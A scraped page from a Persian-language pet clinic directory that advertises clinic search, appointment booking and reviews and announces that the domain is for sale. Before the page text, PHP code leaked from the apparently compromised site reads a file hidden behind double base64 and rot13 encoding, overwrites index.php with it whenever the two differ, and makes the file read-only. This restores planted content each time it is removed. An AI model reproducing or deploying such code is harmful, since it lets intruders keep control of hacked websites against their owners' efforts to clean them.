$i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } کلینیک پت – معرفی بهترین کلینیک ها و پزشکان

نزدیک ترین و بهترین مرکز مورد نظر خود را جستجو کنید

میتوانید با جستجو کردن نام مرکز و یا بخشی از آدرس اطلاعات مورد نظر را دریافت کنید

میتوانید از صفحه دریافت نوبت به راحتی از بهترین پزشکان و کلینیک ها نوبت دریافت کنید. 

این لیست از طریق پشتیبانی های ما بصورت دائم و مستمر بروزرسانی می‌شود.

میتوانید تجربه ها و نظرات خود را با بقیه درمیان بگذارید و از تجربه ها و نظرات دیگران بهره ببرید.

چرا باید از کلینیک پت استفاده کنیم:

این دامنه برای فروش می‌باشد

برای اطلاعات بیشتر تماس بگیرید.

02188883650